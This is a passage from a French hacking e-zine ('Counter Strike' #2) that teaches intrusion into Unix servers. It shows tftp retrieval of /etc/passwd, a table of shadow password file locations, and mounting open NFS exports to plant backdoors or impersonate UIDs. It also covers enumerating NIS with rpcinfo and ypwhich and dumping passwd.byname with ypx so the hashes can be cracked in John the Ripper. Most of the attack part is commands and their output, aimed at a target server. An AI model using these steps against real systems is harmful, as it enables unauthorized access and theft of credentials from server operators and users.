-Y'a aussi les cgi: ( ya des scanners pour ca >VoideYe sur Tipiak).Je m'étend pas dessus, si le scanner il dit y'a bon, ben vous mettez lurl dans le browser et c'est fini...Ca aussi ca devient tres difficile a trouver...

tftp :

Il existe un programme semblable a ftp: tftp ( trivial file transfert program ) qui permet, si le démon est présent d'écrire et de lire partout sur le server, sans avoir besoin de pass...La encore, l'admin du server doit etre con comme pas deux.

Tipwar $ tftp
tftp> connect www.cible.com

get /etc/passwd


J'ouvre juste une petite parenthèse pour vous parler des passwd shadow...Je vais pas m'étendre la dessus, ya assez de doc la dessus j'inclus jute un ptit tableau avec l'endroit ou se trouve ce que l'on cherche =) ( source: Phrack )
 
OS Path
Sun OS 4.1 /etc/security/passwd.adjunct
Sun OS 5.0 /etc/shadow
System V 4.0 /etc/shadow
System V 4.2 /etc/security
ConvexOS 10/11 /etc/shadow
Linux /etc/shadow
IRIX 5 /etc/shadow
AIX /etc/security/passwd
BSD4.3-Reno /etc/master.passwd
Dg ux /etc/tcb/aa/user
Hp ux /.secure/etc/passwd
Unicos /etc/udb

Un dernier mot: un fichier passwd, meme shadow, c'est toujours intérssant: amusez vous a essayer de vous logger en utilisant le meme pass que le login, vous verrez, ca porte souvent ses fruits;
Voila, un account pour vous et en utilisant ce kon a vu audessus (nmap), ben vous allez sur rootshell.com et vous me trouvez un tit exploit =)

 

NFS (Network File System)

Bon c'est koi NFS ?

En fait c un protocole reseau qui permet de vous faire bosser sur un fichier a l'autre bout du monde en vous donnant l'illusion qu'il est sur votre PC en fait on peut comparer c'est l'aquivalent de la commande mount mais avec le hd d'un autre pc distant. On va s'en servir pour inspecter la cible , ou meme avoir un shell branche dessus . Il se peut aussi que vous puissiez y placer des taupes en tout genre ou des backdoors. A part ca vous pourrez tres bien prendre l'UID ou le GID ( User Identification Number / Group Identification Number ) d'un utilisateur quelquonque en parametrant votre Linux .


Pour connaitre les fichiers qui pouraient etres exportes tapez dans un shell : #showmount -e www.url.com

Ca vous donnes un truc du genre:

export list for www.url.com
/etc (everyone)
/bin (bibi)

Traduction :
/etc (everyone) : signifie que n'importe qui peut exporter ce repertoire
/bin (bibi) : signifie que seul l'utilisateur bibi peut exporter ce repertoir

Pour exporter un systeme de repertoire sur un des dossiers de votre pc , tapez :

#mount -t nfs www.url.com:/systeme_de_repertoires_distant /votre_dossier

ex: #mount -t nfs www.url.com:/etc /mnt/nfs

Dans ce cas la vous trouverez le contenu du hd distant dans le dossier mnt/nfs mais le dossier nfs a du etre cree auparavant.

Je tient a preciser pour ceux qui ne le savent pas que c'est de plus en plus rares de trouver des cas comme cela.

 

NIS (Network instant system)

-Je parlerai en dernier lieu de NIS, un truc un peu plus courant que les failles nommées ci dessus:

NIS, c'est un service de partage de base de données systeme d'un réseau.( du genre etc/group et etc/passwd ).Il sert a exporter par exemple les mots de passes d'un utilisateur vers le réseau, ainsi, il peut avoir acces a son shell depuis nimporte quelle bécane du réseau.
Bref, plus le réseau est gros, plus y'a de chances d'avoir NIS.
Pour voir si ya NIS, rien de plus simple:

Tipwar@root # rpcinfo -p www.cible.com
 
program   vers   proto     port

  100004      2       tcp       673     ypserv
  100005      1       udp       721    mountd

  100003      2       udp     2049    nfs

  100026      1       udp      733     bootparam

  100017      1       tcp     1274     rexd

 

Ah! La c'est cool, y'a ypserv, ca veut dire qu'il ya forcément NIS sur ce server. (Ya aussi bootparam, qui nous indique que c'est une machine sans lecteur de disquettes.)
Maintenant, il va falloir trouver nom de domaine NIS, qui est le nom d'une autre machine, gérant NIS sur le réseau.Ca, c'est le truc le plus chiant...Pour le trouver, on a deux solutions: soit on le trouve comme ca:

Tipwar $ ypwhich -d cible www.cible.com
kewl.cible.com

>C'est bon vous l'avez !
 

Tipwar $ ypwhich -d cible www.cible.com
domain not bound

>C'est pas bon vous l'avez pas.Donc on va essayer autre chose:

Avec rpcinfo, on a vu que le server runnait aussi NFS, cela veut dire que selon le cas, certaines machines peuvent monter un répertoire du serveur su leur disque.Pour le voir:

Tipwar@root # showmount -e www.cible.com
export list for cible.com:

 /export                (everyone)

/home/froot           maggy

Ici, nimporte qui peut monter le repertoire /export, mais le répertoire /home/froot, peut seulement etre monté par la machine maggy du domaine "cible" . Mais ca ne nous avence a rien; en fait, il faudrait plutot ceci :

/var          (everyone)

Dans ce cas:

Tipwar@root # mount -t nfs www.cible.com:/var /mnt

puis allez voir dans /var/yp, c'est a dire /mnt/yp chez vous, et vous trouvez ce putain de nom de domaine...

BOON, maintenant, y'a plus qu'a récupérer le fichier passwd en utilisant un prog ki s'appelle YPX.(inclus dans le mag).
Supposons que vous attaquez www.cible.com et ke la machine qui gère le NIS s'appelle kewl.victim.com, ca donnera ca :

Tipwar $ ypx -d kewl.cible.com cible -m passwd.byname

Voila.passwd.byname (c'est une carte NIS ) c'est l'equivalent de /etc/passwd, donc: john the ripper =)
Vla un tit tableau d'équvalence fichiers-cartesNIS:
 
 

Nom du file Nom de la carte NIS
passwd passwd.byname
group group.byname
networks networks.byaddr
hosts hosts.byaddr
protocols protocols.bynumber
services services.byname
aliases mail.aliases
ethers ethers.byname

Le mot de la fin:

mot

mmh j'ai pas envie de faire d'outro donc j'en fait pas. :p
mmh un ptit greetz ?vi.
Donc greetz à Veinscutsl, remoux, Peace (qui code qui code) et les autres !

 

Conclusion :

Nous voici au terme de la partie [ H A C K I N G ] de cette seconde issue de Counter Strike.
Nous esperons que vous avez aime nos article et fait la difference au moins pour cette partie, entre CounterStrike #1 et CounterStrike #2.

2 articles de cette partie ont etes faits par Fatal, nouvel arrivant dans le groupe, les articles sont :
- Synflood
- NFS

1 article a aussi ete fait par Nnine, qui s'occuppe logiquement du phreacking et pas du tout du hacking mais l'article est de bonne qualite et devrait plaire a tous ceux qui ont envie de commencer a evoluer sur linux, le sujet de l'article est :
-NMAP

2 articles ont etes faits par moi (LoginX) qui suis bien content d'avoir un nouveau partenaire pour s'occuper de cette rubrique avec moi, sans dire que Neo-Soft (qui helas nous a quitte) ne s'occupait pas de cette rubrique, son manque de disponibilite l'a incite a quitter le groupe et nous le regretterons, enfin pour revenir a mes ptites affaires, je suis tout content et tout, et mes articles pour ce numero de CounterStrike #2 sont :
- Utilisation avancee de John the Ripper v1.xx
- Reprendre le controle de son windows 95/98/2000

Pour tout commentaire, tipiak@bigfoot.com

Pour plus de precision sur un article :
LoginX ------> ecomdespe@hotmail.com
Nnine ------> _n9_@caramail.com
Fatal ------> fatal_tipiak@yahoo.fr